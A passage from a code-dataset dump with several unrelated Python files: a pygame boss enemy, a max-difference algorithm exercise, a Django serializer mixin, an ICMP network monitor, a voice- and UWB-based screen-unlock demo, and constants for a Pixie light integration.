IDLE\n\t\t\t\t\tself.times_to_attack -= 1\n\t\t\t\t\tself.attacking = False\n\n\t\t\t\tfor particle in self.particles:\n\t\t\t\t\tparticle[0][1] += 5\n\t\t\t\t\tparticle[0][0] += particle[3]\n\t\t\t\t\tparticle[2] -= 0.02\n\n\t\t\t\t\tif particle[0][1] > SCALE_HEIGHT + 30:\n\t\t\t\t\t\tself.particles.remove(particle)\n\t\t\t\t\n\t\t\t\tif not self.idle_move:\n\t\t\t\t\tif pygame.time.get_ticks() - self.last_walked > 100:\n\t\t\t\t\t\tif random.randint(0, 100) > 80:\n\t\t\t\t\t\t\tself.idle_move = True\n\t\t\t\t\t\t\tself.idle_new_x = random.randint(50, SCALE_WIDTH - 100)\n\t\t\t\t\t\t\twhile abs(self.rect.x - self.idle_new_x) < 50:\n\t\t\t\t\t\t\t\tself.idle_new_x = random.randint(100, SCALE_WIDTH - 100)\n\t\t\t\t\t\t\tif self.idle_new_x > self.rect.x:\n\t\t\t\t\t\t\t\tself.facing_right = True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.facing_right = False\n\t\t\t\telse:\n\t\t\t\t\tself.rect.x += (self.idle_new_x - self.rect.x) * 0.04\n\t\t\t\t\tif abs(self.rect.x - self.idle_new_x) < 30:\n\t\t\t\t\t\tself.idle_new_x = 0\n\t\t\t\t\t\tself.idle_move = False\n\t\t\t\t\t\tself.last_walked = pygame.time.get_ticks()\n\t\t\t\t\t\tself.walk_wait_times = random.randint(200, 1200)\n\n\t\telse:\n\t\t\tself.current_frame += 0.09\n\t\t\tif int(self.current_frame) > len(self.action) - 
1:\n\t\t\t\tself.current_frame = 0\n\t\t\t\tself.state = IDLE\n\t\tself.image = self.action[int(self.current_frame)]\n\n\t\tif self.attack_hand is not None and self.attack_hand.state == \"done\":\n\t\t\tself.attack_hand = None\n\n\t\tif self.state == IDLE and self.entered:\n\t\t\tif not self.idle_move:\n\t\t\t\tif pygame.time.get_ticks() - self.last_walked > self.walk_wait_times:\n\t\t\t\t\tif random.randint(0, 100) > 80:\n\t\t\t\t\t\tself.idle_move = True\n\t\t\t\t\t\tself.idle_new_x = random.randint(50, SCALE_WIDTH - 100)\n\t\t\t\t\t\twhile abs(self.rect.x - self.idle_new_x) < 50:\n\t\t\t\t\t\t\tself.idle_new_x = random.randint(100, SCALE_WIDTH - 100)\n\t\t\t\t\t\tif self.idle_new_x > self.rect.x:\n\t\t\t\t\t\t\tself.facing_right = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.facing_right = False\n\t\t\telse:\n\t\t\t\tself.rect.x += (self.idle_new_x - self.rect.x) * 0.04\n\t\t\t\tif abs(self.rect.x - self.idle_new_x) < 30:\n\t\t\t\t\tself.idle_new_x = 0\n\t\t\t\t\tself.idle_move = False\n\t\t\t\t\tself.last_walked = pygame.time.get_ticks()\n\t\t\t\t\tself.walk_wait_times = random.randint(200, 1200)\n\t\t\n\t\tif self.times_to_attack <= 0:\n\t\t\tself.times_to_attack = random.randint(10, 20)\n\t\t\tself.moving_to_cooldown = True\n\t\t\tself.state = COOLDOWN\n\n\t\tif not self.entered:\n\t\t\tif self.rect.y < SCALE_HEIGHT/2 - 100:\n\t\t\t\tself.rect.y += 2\n\t\t\telse:\n\t\t\t\tif self.entered_time == 0:\n\t\t\t\t\tself.entered_time = pygame.time.get_ticks()\n\t\t\t\t\tself.message = {\n\t\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\t\"text\": \"HUMANS MUST DIE!!!!!\",\n\t\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\t\"wait_time\": 1500\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tif pygame.time.get_ticks() - self.entered_time > 500:\n\t\t\t\t\t\tself.entered = True\n\t\t\t\t\t\tself.state = BASE_ATTACK\n\t\t\t\t\t\tself.attacking = True\n\t\t\n\t\tif self.entered and not self.attacking and self.attack_hand is None and not self.moving_to_cooldown and not self.cooling_down and not self.moving_back:\n\t\t\tattack = random.choice(ATTACK_STAGES[str(self.stage)])\n\t\t\tif attack == BASE_ATTACK:\n\t\t\t\tself.state = BASE_ATTACK\n\t\t\t\tself.attacking = True\n\t\t\telif attack == SUPER_SMASH:\n\t\t\t\tself.state = SUPER_SMASH\n\t\t\t\tself.attacking = True\n\t\t\t\tself.smashed_times = 0\n\t\t\t\tself.smash_times = random.randint(8, 18)\n\t\t\t\tself.message = {\n\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\"text\": \"!!!!DIE!!!!\",\n\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\"wait_time\": 900\n\t\t\t\t}\n\t\t\telif attack == HELL_FIRE:\n\t\t\t\tself.state = HELL_FIRE\n\t\t\t\tself.attacking = True\n\t\t\t\tself.current_frame = 0\n\t\t\t\tself.bombs = 0\n\t\t\t\tself.message = {\n\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\"text\": \"HELL FIRE\",\n\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\"wait_time\": 1200\n\t\t\t\t}\n\t\t\n\t\tif pygame.mouse.get_pressed()[0]:\n\t\t\tself.health -= 6\n\n\t\tif self.health > self.max_health * 2/3:\n\t\t\tself.stage = 1\n\t\telif self.health > self.max_health * 1/3:\n\t\t\tself.stage = 2\n\t\telse:\n\t\t\tself.stage = 3\n\n\tdef circle_surf(self, radius, color):\n\t\tsurf = pygame.Surface((radius * 2, radius * 2))\n\t\tpygame.draw.circle(surf, color, (radius, radius), radius)\n\t\tsurf.set_colorkey((0, 0, 0))\n\t\treturn surf\n\t\n\tdef render(self, screen):\t\t\n\t\t# pygame.draw.rect(screen, (0, 255, 0), self.rect)\n\t\timage = self.image.copy()\n\t\tif not self.facing_right:\n\t\t\timage = 
pygame.transform.flip(self.image, True, False)\n\t\t\n\t\tif self.stage == 2:\n\t\t\tlist_of_colors = [\n\t\t\t\t[\"#df2929\", \"#28ccdf\"],\n\t\t\t\t[\"#f18a8a\", \"#8aebf1\"],\n\t\t\t\t[\"#a83939\", \"#3978a8\"],\n\t\t\t]\n\t\t\tfor colors in list_of_colors:\n\t\t\t\timage = palette_swap(image, colors[1], colors[0])\n\t\t\t\timage.set_colorkey((0, 0, 0))\n\t\telif self.stage == 3:\n\t\t\tlist_of_colors = [\n\t\t\t\t[\"#df2929\", \"#28ccdf\"],\n\t\t\t\t[\"#f18a8a\", \"#8aebf1\"],\n\t\t\t\t[\"#a83939\", \"#3978a8\"],\n\t\t\t\t[\"#783939\", \"#394778\"],\n\t\t\t\t[\"#6d3232\", \"#302c2e\"],\n\t\t\t]\n\t\t\tfor colors in list_of_colors:\n\t\t\t\timage = palette_swap(image, colors[1], colors[0])\n\t\t\t\timage.set_colorkey((0, 0, 0))\n\n\t\tscreen.blit(image, (self.rect.centerx - self.image.get_width()/2, self.rect.centery - self.image.get_height()/2))\n\n\t\tif self.message is not None:\n\t\t\tif pygame.time.get_ticks() - self.message[\"create_time\"] > self.message[\"wait_time\"]:\n\t\t\t\tself.message = None\n\t\t\telse:\n\t\t\t\ttext = MESSAGE_TEXT_FONT.render(self.message[\"text\"], False, (255, 255, 255))\n\t\t\t\tscreen.blit(text, (self.rect.centerx - text.get_width()/2, self.rect.centery - 60))\n\t\t\n\t\tfor particle in self.particles:\n\t\t\tpygame.draw.circle(screen, (255, 255, 255), [int(particle[0][0]), int(particle[0][1])], int(particle[2]))\n\n\t\t\tradius = particle[2] * 2\n\t\t\tscreen.blit(self.circle_surf(radius, (20, 150, 60)), (int(particle[0][0] - radius), int(particle[0][1] - radius)), special_flags=pygame.BLEND_RGB_ADD)\n\t\t\n\t\tif self.message is None and self.entered:\n\t\t\twidth = self.health / self.health_ratio\n\t\t\tpygame.draw.rect(screen, (255, 0, 0),(SCALE_WIDTH/2 - self.health_bar_length/2, 10, width, 15))\n\t\t\tpygame.draw.rect(screen, (0, 0, 0),(SCALE_WIDTH/2 - self.health_bar_length/2, 10, self.health_bar_length, 15), 2)\n\t\t\n\t\tif self.attack_hand is not None:\n\t\t\tself.attack_hand.update()\n\t\t\tself.attack_hand.render(screen)\n\t\t\n\n","repo_name":"KidCoderT/NatureFightBack","sub_path":"scripts/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6705229698","text":"'''\nGive a Θ(n log n) time divide and conquer algorithm that given an array A of n integers, finds two indices i < j \nsuch that A[j] - A[i] is maximized. 
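For example, for A = [2, 9, 1, 6] the answer is i = 0 and j = 1, since A[1] - A[0] = 7 is the largest such difference. 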
Analyze and show that your algorithm runs in the required Θ(n log n) time.\n'''\ndef findMin(arr, low, high):\n    # return the index of the minimum element in arr[low..high]\n    idx = low\n    for i in range(low + 1, high + 1):\n        if arr[i] < arr[idx]:\n            idx = i\n    return idx\n\ndef findMax(arr, low, high):\n    # return the index of the maximum element in arr[low..high]\n    idx = low\n    for i in range(low + 1, high + 1):\n        if arr[i] > arr[idx]:\n            idx = i\n    return idx\n\ndef find_max_difference(arr, l, r):\n    if l >= r:\n        return l, r, 0\n    mid = l + (r - l) // 2\n    i1, j1, left_max_diff = find_max_difference(arr, l, mid)\n    i2, j2, right_max_diff = find_max_difference(arr, mid + 1, r)\n    # cross case: take the minimum from the left half and the maximum from the\n    # right half; tracking the indices directly (rather than arr.index, which\n    # may find a duplicate outside the half) guarantees i < j\n    i3 = findMin(arr, l, mid)\n    j3 = findMax(arr, mid + 1, r)\n    max_diff = max(left_max_diff, right_max_diff, arr[j3] - arr[i3])\n    if left_max_diff == max_diff:\n        return i1, j1, max_diff\n    elif right_max_diff == max_diff:\n        return i2, j2, max_diff\n    else:\n        return i3, j3, max_diff\n\n# Example usage\narr = [4, 3, 10, 2, 9, 1, 6]\ni, j, max_diff = find_max_difference(arr, 0, len(arr) - 1)\nprint(f\"Indices i = {i}, j = {j}, Max Difference = {max_diff}\")\n# Indices i = 1, j = 2, Max Difference = 7\n","repo_name":"Yutong1996/CS5800-Algorithm-Homework","sub_path":"divide_and_conquer.py","file_name":"divide_and_conquer.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"4599640273","text":"from rest_framework.fields import empty\n\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass G3WRequestSerializer(object):\n    \"\"\"\n    DRF mixin serializer to get the django request object.\n    \"\"\"\n    def __init__(self, instance=None, data=empty, **kwargs):\n\n        try:\n            self.request = kwargs['request']\n            del (kwargs['request'])\n        except KeyError:\n            LOGGER.warning('Serializer without request: it might be ok when called from a management command')\n            self.request = None\n\n        super(G3WRequestSerializer, self).__init__(instance, data, **kwargs)\n","repo_name":"g3w-suite/g3w-admin","sub_path":"g3w-admin/core/mixins/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"52"}
+{"seq_id":"74031041126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n    Monitor (and log) a network connection\n\"\"\"\nimport enum\nimport sys\nimport os\nimport argparse\nimport logging\nimport time\nfrom datetime import timedelta\nfrom typing import List, Union\n\n__version__ = '1.1.1'\n__author__ = 'David Nugent '\n\n\nclass ConnectionState(enum.Enum):\n    DOWN = 0\n    UP = 1\n\n\ndef prog_name(prog: str) -> str:\n    return os.path.basename(prog)\n\n\ndef parse_args(prog: str, args: List[str],\n               namespace: Union[argparse.Namespace, None] = None) -> argparse.Namespace:\n    prog = prog_name(prog)\n    parser = argparse.ArgumentParser(prog=prog, description=__doc__)\n    parser.add_argument('-H', '--host', action='store', default='8.8.8.8',\n                        help='host name or ip to test against')\n    parser.add_argument('-i', '--interval', action='store', type=float, default=1.0,\n                        help='interval between tests (default 1.0 secs)')\n    parser.add_argument('-e', '--errors', action='store', type=int, default=4,\n                        help='number of errors (lost packets) before connection is considered dead')\n    parser.add_argument('-t', '--times', action='store', type=int, default=None,\n                        help='maximum number of times to try (default not set = forever)')\n    parser.add_argument('-l', '--logfile', action='store', default=None,\n                        help='create or append log to a file (default none = no log file)')\n    parser.add_argument('-c', '--csv', action='store', default=None,\n                        help='create or append RTT data to CSV file (default none = no RTT data logged)')\n    parser.add_argument('-v', '--verbose', action='count', default=0,\n                        help='increase logging verbosity')\n    parser.add_argument('-V', '--version', action='version', version=f'{prog} v{__version__} by {__author__}',\n                        help='print version and exit')\n    namespace = namespace or argparse.Namespace(prog=prog, parser=parser, rdd=None)\n    return parser.parse_args(args, namespace)\n\n\ndef setup_logging(logfile: str, verbosity: int) -> logging.Logger:\n    logging.getLogger().handlers = []  # reset\n    formatter = logging.Formatter('%(asctime)s %(name)s %(message)s')\n    logger = logging.getLogger('cmon')\n    # root logger level\n    logger.setLevel(logging.WARNING if verbosity == 0 else logging.INFO if verbosity == 1 else logging.DEBUG)\n    if logfile:\n        # file logger\n        fh = logging.FileHandler(logfile)\n        fh.setLevel(logging.DEBUG)\n        fh.setFormatter(formatter)\n        logger.addHandler(fh)\n    ch = logging.StreamHandler()\n    ch.setLevel(logging.DEBUG)\n    ch.setFormatter(formatter)\n    logger.addHandler(ch)\n    return logger\n\n\nclass CSVLog:\n    HEADERS = 'timestamp,host,state,status,rtt\\n'\n\n    def __init__(self, filename):\n        self._filename = filename\n        self._fd = None\n\n    @property\n    def filename(self):\n        return self._filename\n\n    def open(self):\n        if self._filename:\n            try:\n                self._fd = open(self._filename, mode='a+', encoding='utf-8')\n                # write headers if at the beginning of an empty file\n                if self._fd.tell() == 0:\n                    self._fd.write(self.HEADERS)\n            except EnvironmentError:\n                raise\n            except (TypeError, AttributeError):\n                pass\n            return True\n        return False\n\n    def close(self):\n        if self._fd is not None:\n            self._fd.close()\n\n    @staticmethod\n    def esc(string):\n        if not string:\n            string = ''\n        elif '\"' in string:\n            string = '\"' + ''.join([f\"\\\\{x}\" if x == '\"' else x for x in string]) + '\"'\n        return string\n\n    def add(self, timestamp: float, host: str, state: str, status: str, rtt: float):\n        if self._fd is not None:\n            self._fd.write(f\"{timestamp},{self.esc(host)},{state},{self.esc(status)},{0.0 if not rtt else rtt}\\n\")\n            self._fd.flush()\n\n\ndef monitor(logger: logging.Logger, csv: CSVLog, host: str, interval: float, errors: int, times: int):\n    from scapy.layers.inet import ICMP, IP\n    from scapy.sendrecv import sr1\n\n    currentstate = None\n    uptime = downtime = None\n    pingcount = errcount = 0\n\n    def in_milliseconds(value: float):\n        return int(value * 1000000) / 1000\n\n    def getstate(c: ConnectionState) -> str:\n        return 'U' if c == ConnectionState.UP else 'D'\n\n    def diagnostic(sent, rcvd, e):\n        new_state = ConnectionState.DOWN\n        rtt = None\n        if rcvd is None:\n            result = 'timeout'\n        elif e:\n            result = f'error {e}: {e.args}'\n        elif rcvd.src != sent.dst: # assume response from intermediary\n            result = f'not reachable {rcvd.src} type={rcvd.type}'\n        else:\n            result = 'success'\n            new_state = ConnectionState.UP\n            rtt = in_milliseconds(rcvd.time - sent.sent_time)\n        csv.add(sent.sent_time, host, getstate(new_state), result, rtt)\n        logger.debug(f'{host} icmp {result}{\" \" + str(rtt) + \" ms\" if rtt else \"\"}')\n        return new_state\n\n    def lost(up_time):\n        nonlocal downtime\n        up_for = \"\"\n        if up_time is not None and downtime is not None:\n            duration = downtime - up_time\n            up_for = f\" uptime {timedelta(seconds=duration)}\"\n        logger.warning(f'{host} DOWN{up_for}')\n\n    def recovered(current):\n        nonlocal downtime, uptime, errcount\n        uptime = current\n        down_for = \"\"\n        if downtime is not None:\n            duration = current - downtime\n            down_for = f\" downtime {timedelta(seconds=duration)}\"\n        logger.warning(f'{host} UP{down_for}')\n        errcount = 0\n        downtime = None\n\n    if os.geteuid() != 0:\n        raise PermissionError('this script requires elevated (root) privileges')\n\n    while not times or pingcount < times:\n        icmp = IP(dst=host)/ICMP()\n        pingcount += 1\n        endat = time.time() + interval\n        exc = rsp = None\n        starttime = time.time()\n        try:\n            rsp = sr1(icmp, timeout=interval, verbose=False)\n        except OSError as ex:\n            exc = ex\n        newstate = diagnostic(icmp, rsp, exc)\n        if currentstate is not ConnectionState.DOWN:\n            if newstate is ConnectionState.DOWN: # UP failure case\n                if downtime is None:\n                    downtime = starttime\n                errcount += 1\n                if errcount >= errors:\n                    lost(uptime)\n                    currentstate = newstate\n            elif currentstate is not ConnectionState.UP: # found UP\n                recovered(starttime)\n                currentstate = newstate\n        elif newstate is ConnectionState.UP:\n            recovered(starttime)\n            currentstate = newstate\n        if starttime < endat:\n            time.sleep(endat - starttime)\n    return 0 if currentstate is ConnectionState.UP else 1\n\n\ndef run(argv: argparse.Namespace) -> int:\n    logger = setup_logging(argv.logfile, argv.verbose)\n    csv = CSVLog(argv.csv)\n    message = f'Start host={argv.host} interval={argv.interval} maxerr={argv.errors}'\n    if argv.times:\n        message += f\" times={argv.times}\"\n    if csv:\n        message += f\" csv={csv.filename}\"\n    message += f\"; v{__version__}\"\n    logger.info(message)\n    started = time.time()\n    try:\n        csv.open()\n        monitor(logger, csv, argv.host, argv.interval, argv.errors, argv.times)\n    except (KeyboardInterrupt, PermissionError, ImportError) as exc:\n        logger.critical(f'Terminated: {exc.__class__.__name__}')\n    csv.close()\n    logger.info(f'Elapsed: {time.time() - started}')\n    return 0\n\n\ndef main(prog: str, args: List[str]):\n    return run(parse_args(prog, args))\n\n\nif __name__ == '__main__':\n    exit(main(sys.argv[0], sys.argv[1:]))\n","repo_name":"deeprave/cmon","sub_path":"src/cmon.py","file_name":"cmon.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"38579098967","text":"#!/usr/bin/python3 \n\nimport serial\nimport os\nimport subprocess\nimport sys\nimport time\nimport traceback\nimport Quartz\nfrom ctypes import CDLL\nfrom piwho import recognition, vad\nimport pyaudio\nimport wave\n\n#below section is to import necessary packages from SpeechBrain. Pre-req follow the instructions to install SpeechBrain\n#required to run in root directory/speechbrain, otherwise speechbrain model will give error\n#python3 -m pip xxx\nfrom speechbrain.pretrained import SpeakerRecognition\n\n#below section is to import necessary packages from VOSK. 
Pre-req follow the instructions to install VOSK\nfrom vosk import Model, KaldiRecognizer, SetLogLevel\nimport json\nimport jellyfish \n\n#use speechbrain's speaker recognition model\nverification = SpeakerRecognition.from_hparams(source=\"speechbrain/spkrec-ecapa-voxceleb\", savedir=\"pretrained_models/spkrec-ecapa-voxceleb\")\n#asr_model = EncoderDecoderASR.from_hparams(source=\"speechbrain/asr-transformer-transformerlm-librispeech\", savedir=\"pretrained_models/asr-transformer-transformerlm-librispeech\")\n\n#use VOSK's ASR model - small, much better recognition latency\nasr_model = Model(lang=\"en-us\")\n\nchunk = 1024 # Record in chunks of 1024 samples\nsample_format = pyaudio.paInt16 # 16 bits per sample\nchannels = 1\nfs = 16000 # Record at 44100 samples per second\nseconds = 3\nfilename = \"to_be_verified.wav\"\n\nbadge_ids = {\n# '920A' : 'Alicia',\n '920A' : 'isaac',\n}\n\nsecretphrase = \"this is my secret phrase\"\n\ndef is_screen_locked():\n \"\"\" check if screen is currently locked \"\"\"\n settings = Quartz.CGSessionCopyCurrentDictionary()\n return (\"CGSSessionScreenIsLocked = 1\" in settings)\n\ndef identify_voice(speaker):\n \"\"\" check if speaker's voice matches the record \"\"\"\n # vad.record()\n p = pyaudio.PyAudio() # Create an interface to PortAudio\n\n print('Recording')\n\n stream = p.open(format=sample_format,\n channels=channels,\n rate=fs,\n frames_per_buffer=chunk,\n input=True)\n\n frames = [] # Initialize array to store frames\n\n # Store data in chunks for 3 seconds\n for i in range(0, int(fs / chunk * seconds)):\n data = stream.read(chunk)\n frames.append(data)\n\n # Stop and close the stream \n stream.stop_stream()\n stream.close()\n # Terminate the PortAudio interface\n p.terminate()\n\n print('Finished recording')\n\n # Save the recorded data as a WAV file\n wf = wave.open(filename, 'wb')\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(sample_format))\n wf.setframerate(fs)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n print('verifying ' + speaker)\n file1 = '/Users/Stevehe/Downloads/demo/speechbrain/to_be_verified.wav'\n file2 = '/Users/Stevehe/Downloads/demo/speechbrain/isaacoutput.wav'\n\n score, prediction = verification.verify_files(file1, file2)\n\n print('raw score: ' + str(score))\n print('verification result: ' + str(prediction.item()))\n\n if prediction.item() is False:\n os.system(\"say 'Voice does not match, you are not \" + name + \"!'\")\n\n sim_score = 0\n wf = wave.open(file1, \"rb\")\n\n # initialize a str to hold results\n results = \"\"\n textResults = \"\"\n \n if (prediction.item()):\n rec = KaldiRecognizer(asr_model, wf.getframerate())\n rec.SetWords(True)\n\n\n while True:\n data = wf.readframes(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n recognizerResult = rec.Result()\n results = results + recognizerResult\n # convert the recognizerResult string into a dictionary \n resultDict = json.loads(recognizerResult)\n # save the 'text' value from the dictionary into a list\n textResults = textResults + resultDict.get(\"text\", \"\")\n\n else:\n recognizerResult = rec.PartialResult()\n results = recognizerResult\n # convert the recognizerResult string into a dictionary \n resultDict = json.loads(recognizerResult)\n # save the 'text' value from the dictionary into textResults\n if (len(resultDict.get(\"partial\", \"\")) != 0):\n textResults = resultDict.get(\"partial\", \"\")\n print (\"rec.PartialResults: \" + textResults)\n \n # process \"final\" result\n results = results + 
rec.FinalResult()\n resultDict = json.loads(rec.FinalResult())\n textResults = textResults + resultDict.get(\"text\", \"\")\n\n sim_score = jellyfish.jaro_similarity(textResults, secretphrase)\n \n print (\"transcribed text is: \" + textResults)\n print (\"sim_score is: \" + str(sim_score))\n #transcribed = asr_model.transcribe_file(file1) for speechbrain's ASR model\n if sim_score < 0.8:\n os.system(\"say '\" + name + \" your secret phrase is incorrect!'\")\n \n \n return (prediction.item() and sim_score > 0.8)\n\ndef in_secure_area(locked, x, y, z):\n \"\"\" check if the given location is in the secure area \n\n Coordinate system\n\n x (0.4, 0)\n <---------------------------------------------- (0, 0)\n | |\n | COMPUTER |\n |____________________| (0, 0.25) |\n |\n |\n \\|/ y\n \"\"\"\n # calibrated model\n y = 1.24 * y + 0.15\n print(\"After calibration: x = \" + str(x) + \", y = \" + str(y))\n\n x_min = -0.5\n x_max = 1.0\n y_min = -0.5\n y_max = 1.0\n\n gray_space = 0.2\n if locked is True:\n return (x >= (x_min + gray_space) and x <= (x_max - gray_space) and y <= (y_max - gray_space) and y >= (y_min + gray_space))\n else:\n return (x >= x_min and x <= x_max and y <= y_max and y >= y_min)\n\n\n# object for voice recognition from old model\n#recog = recognition.SpeakerRecognizer('./')\n#print(recog.get_speakers())\n\n# object for locking screen\nloginPF = CDLL('/System/Library/PrivateFrameworks/login.framework/Versions/Current/login')\n\n# connect to DWM listener node\nDWM = serial.Serial(port=\"/dev/tty.usbmodem0007601808241\", baudrate=115200)\nprint(\"Connected to \" + DWM.name)\nDWM.write(\"\\r\\r\".encode())\nprint(\"Encoded\")\n#time.sleep(1)\n\n# lep is a DWM command to start reporting position of the active tags in the network\nDWM.write(\"lep\\r\".encode())\nprint(\"Encoded\")\n#time.sleep(1)\n\n# get the initial state of the screen\nlocked = is_screen_locked()\nprint(\"ScreenIsLocked = \" + str(locked))\n\nos.system('say \"Enter the system.\"')\ntry:\n while True:\n # read report from DWM board and parse the information\n #print (\"reading UWB data\")\n data = DWM.readline()\n #print (\"read data \" + str(data))\n if(data):\n #print(data)\n data = data.decode()\n # Expected output format from 'lep' command\n # POS,0,18B9,2.57,2.00,1.67,97 (meaning: position, tag_node_index, tag_device_id, x, y, z, quality_factor)\n if (\"POS\" in data):\n data = data.replace(\"\\r\\n\", \"\")\n data = data.split(\",\")\n id = data[2]\n quality_factor = int(data[6])\n if quality_factor > 80 and id in badge_ids:\n print(data)\n x = float(data[3])\n y = float(data[4])\n z = float(data[5])\n \n # map device ID to user name\n name = badge_ids[data[2]]\n print('check speaker ' + name)\n\n # check if the current location is within the predefined secure area bounding box\n dist_check = in_secure_area(locked, x, y, z)\n\n if locked is True and dist_check is True:\n print(\"Unlocking location: x = \" + str(x) + \" y = \" + str(y))\n os.system('say \"You have entered the secure area, please speak to unlock the computer\"')\n\n # check if voice matches\n voice_check = identify_voice(name)\n if voice_check is True:\n subprocess.call('./unlock_screen.csh', shell=True)\n locked = False\n os.system(\"say 'Hello, \" + name + \"!'\")\n else:\n os.system(\"say 'please try again!'\")\n elif locked is False and dist_check is False:\n print(\"Locking location: x = \" + str(x) + \" y = \" + str(y))\n os.system('say \"' + name + ' is out of the secure area, locking the computer.\"')\n # Lock screen\n result = 
loginPF.SACLockScreenImmediate()\n locked = True\n #print(\"quality_factor is too low: \" + str(quality_factor) + \" or id is wrong \" + id)\n #print (\"POS not in data\" + str(data))\n DWM.flushInput()\n #print (\"no valid data received\")\n DWM.flushInput()\n DWM.write(\"\\r\".encode())\n DWM.close()\n\nexcept KeyboardInterrupt:\n print(\"Stop\")\n DWM.write(\"\\r\\r\".encode())\n DWM.close()\nexcept Exception as e:\n print(traceback.format_exc())\n DWM.write(\"\\r\\r\".encode())\n DWM.close()\n\n","repo_name":"Opby/vectorauth","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39975507561","text":"\"\"\" Pixie constants \"\"\"\n\nDOMAIN = \"pixie\"\n\nCONF_DEVICE_ID = \"device_id\"\nCONF_CHANNEL = \"channel\"\nCONF_NAME = \"name\"\n \nPIXIE_ATTR_STATE = \"state\"\nPIXIE_ATTR_PICTURE = \"picture\"\nPIXIE_ATTR_TRANSITION_NAME = \"transition_name\"\nPIXIE_ATTR_TRANSITION = \"transition\"\nPIXIE_ATTR_EFFECT = \"effect\"\nPIXIE_ATTR_PARAMETER1 = \"parameter1\"\nPIXIE_ATTR_PARAMETER2 = \"parameter2\"\nPIXIE_ATTR_BRIGHTNESS = \"brightness\"\nPIXIE_ATTR_BOARD_TEMPERATURE = \"board_temperature\"\nPIXIE_ATTR_UPTIME = \"uptime\"\nPIXIE_ATTR_FIRMWARE_VERSION = \"firmware_version\"\nPIXIE_ATTR_MAC = \"mac\"\nPIXIE_ATTR_IP_ADDR = \"ip_addr\"\nPIXIE_ATTR_URL = \"url\"\n\n# Services\nSERVICE_SET_EFFECT = \"set_effect\"\nSERVICE_SET_RANDOM_EFFECT = \"set_random_effect\"\nSERVICE_SET_PICTURE = \"set_picture\"\nSERVICE_TURN_ON_TRANSITION = \"turn_on_transition\"\nSERVICE_TURN_OFF_TRANSITION = \"turn_off_transition\"\nSERVICE_CHECK_OTA = \"check_ota\"\n\n\nPIXIE_EFFECT_LIST = [\n \"ColorLoop\",\n \"Rainbow\",\n \"DoubleRainbow\",\n \"RainbowChase\",\n \"RunningLights\",\n \"TwoColors\",\n \"ThreeColors\",\n \"ColorPeaks\",\n \"Sparks\",\n \"Comet\",\n \"CometWithParticles\",\n \"RandomComets\",\n \"ColorFadings\",\n \"Sparkles\",\n \"SparklesOnColor\",\n \"SparklesOnColorLoop\",\n \"RainbowWipesUp\",\n \"RainbowWipesDown\",\n \"ColorWipes\",\n \"Chain\",\n \"BrokenLamp\",\n \"FastPixels\",\n \"BrightStripes\",\n \"DarkStripes\",\n \"MulticolorBurst\",\n \"OneColorBurst\",\n \"RandomColorBurst\",\n \"ColorPendulum\",\n \"RainbowScan\",\n \"DoubleRainbowScan\",\n \"RandomColor\",\n \"ChaseDown\",\n \"ChaseUp\",\n \"Chase2Down\",\n \"Chase2Up\",\n \"SporadicMeteors\",\n \"Dots\",\n \"RGBScanner\",\n \"Twinkles\",\n \"PixelQueue\",\n \"PeriodicMeteorsUp\",\n \"PeriodicMeteorsDown\",\n \"Flicker\",\n \"MultiplePixelQueues\",\n \"MultipleColorPixelQueues\",\n \"Fireworks\",\n \"Strobe\",\n \"BigSparks\",\n \"RunAndLightUp\",\n \"Moths\",\n \"Breathe\",\n \"Pixie\",\n \"Neutrinos\",\n \"Emitter\",\n \"BlackHole\",\n \"ColorRunsUp\",\n \"ColorRunsDown\",\n \"LightBars\",\n \"Fireworks2\",\n \"Paintbrush\",\n \"Lightning\",\n \"DarkSparklesOnColor\",\n \"Noise\",\n \"Particles\",\n \"Curtains\",\n \"Scanner\",\n \"OscillatingRainbow\",\n \"FlyingColorsUp\",\n \"FlyingColorsDown\",\n \"Waves\",\n]\n\nPIXIE_PICTURE_LIST = [\n \"Rainbow\",\n \"Rainbow2\",\n \"Rainbow3\",\n \"Rainbow4\",\n \"Dots\",\n \"Stripes\",\n \"ProgressBar\",\n \"Noise\",\n]\n\nPIXIE_TRANSITION_LIST = [\n \"Fade\",\n \"Unfold\",\n \"Fold\",\n \"Unroll\",\n \"Roll\",\n \"Dots\",\n \"FadeOut\",\n \"SinIn\",\n \"SinOut\",\n \"Paintbrush\",\n 
